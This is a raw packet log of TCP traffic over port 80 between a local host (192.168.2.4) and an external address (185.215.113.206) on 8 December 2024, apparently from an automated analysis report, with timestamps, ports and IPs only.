Dec 8, 2024 19:52:25.866857052 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.867614985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.867655993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.867741108 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.867784023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.868464947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.868510008 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.868541956 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.868580103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.869379997 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.869391918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.869424105 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.870172977 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.870213985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.870280981 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.870343924 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.871085882 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.871129990 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.871174097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.871213913 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.871959925 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.872001886 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.872090101 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.872134924 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.872827053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.872855902 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.872868061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.872889042 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.873625994 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.873666048 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.873754978 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.873797894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.874541044 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.874583960 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.874604940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.874640942 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.875423908 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.875466108 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.875546932 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.875591993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.876305103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.876349926 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.876369953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.876409054 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.877104044 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.877157927 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.877203941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.877239943 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.877969980 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.878015041 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.878087997 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.878132105 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.878834009 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.878988028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.879050970 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.879093885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.879724979 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.879770994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.879813910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.879853964 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.880557060 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.880604029 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.880737066 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.880779982 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.881433964 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.881475925 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.881627083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.881669998 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.882651091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.882700920 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.882761002 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.882802963 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.883456945 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.883497953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.883570910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.883610010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:25.884319067 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:25.884362936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.032005072 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.032020092 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.032031059 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.032042980 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.032075882 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.032105923 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.032572985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.032619953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.032675028 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.032716036 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.033293009 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.033304930 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.033360004 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.033370972 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.034168005 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.034216881 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.034244061 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.034281015 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.034943104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.034996033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.035161972 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.035202980 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.035782099 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.035823107 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.035958052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.036005974 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.036693096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.036729097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.036851883 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.036890984 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.037555933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.037614107 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.037617922 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.037658930 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.038394928 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.038444996 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.038522959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.038563967 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.039304018 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.039350033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.039357901 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.039393902 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.040170908 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.040221930 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.040319920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.040430069 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.041045904 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.041086912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.041102886 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.041141033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.041847944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.041899920 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.042004108 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.042046070 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.042762041 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.042823076 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.042850018 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.042886019 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.043576956 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.043711901 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.043715954 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.043746948 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.044459105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.044552088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.044589043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.044604063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.045312881 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.045356035 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.045437098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.045509100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.046288013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.046336889 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.046370029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.046406031 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.047068119 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.047096014 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.047116995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.047136068 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.047965050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.048008919 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.048043013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.048229933 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.048770905 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.048820972 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.048830986 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.048876047 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.049691916 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.049741030 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.049752951 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.049787998 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.050506115 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.050564051 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.050626993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.050664902 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.051351070 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.051393032 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.051500082 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.051548004 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.052232981 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.052321911 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.052340984 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.052481890 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.053179026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.053236961 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.053268909 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.053380966 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.054003954 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.054060936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.054089069 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.054142952 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.054874897 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.054917097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.054948092 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.055057049 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.105237961 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.225816011 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.556843042 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.556890965 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.557009935 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.557034016 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.557358027 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.557404041 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.557439089 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.557477951 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.557960987 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.558008909 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.558121920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.558162928 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.558737040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.558782101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.559134007 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.559176922 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.559214115 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.559259892 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.559963942 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.560024977 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.560059071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.560102940 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.560885906 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.560931921 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.560949087 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.560992002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.561764002 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.561777115 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.561809063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.561820984 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.562539101 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.562580109 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.562701941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.562745094 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.563546896 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.563585997 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.563591003 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.563628912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.564233065 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.564276934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.564323902 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.564368010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.565108061 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.565151930 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.565269947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.565316916 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.565989971 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.566035986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.566142082 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.566181898 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.566890001 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.566935062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.567030907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.567079067 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.567763090 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.567816973 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.567847013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.567888021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.568629026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.568669081 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.568677902 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.568711042 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.569499016 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.569544077 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.569603920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.569650888 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.570326090 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.570385933 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.570410013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.570451975 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.571177959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.571223021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.571331024 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.571373940 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.572051048 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.572093964 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.572151899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.572195053 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.573076010 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.573122025 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.573242903 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.573286057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.573767900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.573812962 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.573901892 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.573955059 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.574641943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.574688911 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.574754953 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.574799061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.575556040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.575603962 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.575670958 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.575717926 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.576389074 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.576442957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.576497078 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.576558113 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.577240944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.577287912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.577349901 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.577390909 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.578155994 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.578212023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.578242064 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.578279972 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.579013109 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.579057932 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.579164982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.579206944 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.579894066 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.579940081 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.579978943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.580025911 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.580750942 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.580766916 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.580794096 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.580805063 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.581640005 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.581716061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.581743002 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.581780910 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.582504988 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.582552910 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.582614899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.582659960 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.583339930 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.583353043 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.583394051 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.584252119 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.584299088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.584330082 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.584433079 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.585231066 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.585294008 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.585335970 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.585378885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.586041927 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.586086988 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.586225033 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.586272001 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.586951971 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.587002039 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.587060928 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:26.587112904 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:26.587775946 CET	80	49748	185.215.113.206	192.168.2.4
